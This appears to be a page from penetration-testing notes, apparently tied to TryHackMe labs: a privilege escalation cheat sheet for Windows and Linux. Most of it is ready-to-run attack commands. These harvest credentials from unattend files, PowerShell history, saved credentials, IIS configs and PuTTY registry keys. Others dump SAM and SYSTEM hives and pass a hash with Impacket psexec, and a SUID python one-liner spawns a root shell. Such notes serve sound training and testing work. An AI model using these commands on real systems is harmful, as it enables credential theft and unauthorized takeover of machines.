Privilege Escalation

Windows Privilege Escalation methods

Harvest credentials from unattended intallation

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

Check Powershell History

cmd.exe %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Credentials

List credentials the user account has access to

cmdkey /list

Used saved credentials and run cmd as other user

runas /savecred /user:admin cmd.exe

Database credentials from IIS settings

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Putty Credentials

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Scheduled Tasks

Get info about "vulntask" and "run as"

schtasks /query /tn vulntask /fo list /v

Manipulate binary or task to have it run as privileged user

Windows Services

Check apphostsvc service details

sc qc apphostsvc

Services stored in HKLM\SYSTEM\CurrentControlSet\Services\

Unquoted binary path exploitation Example: BINARY_PATH_NAME: C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

If we add a C:\MyPrograms\Disk.exe binary, it will be started as a service

SeBackup/SeRestore

reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive

Use Impacket to read dumped hive and pass the hash to authenticate

python3 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
python3 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 [email protected]

Abuse Linux SUID

find / -type f -user root -perm -u=s 2> /dev/null
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

Linux SUID Info: https://gtfobins.github.io/gtfobins/python/#suid

Tools

Previoussmbmap remote execution NextAttacking Azure AD

Last updated 2 years ago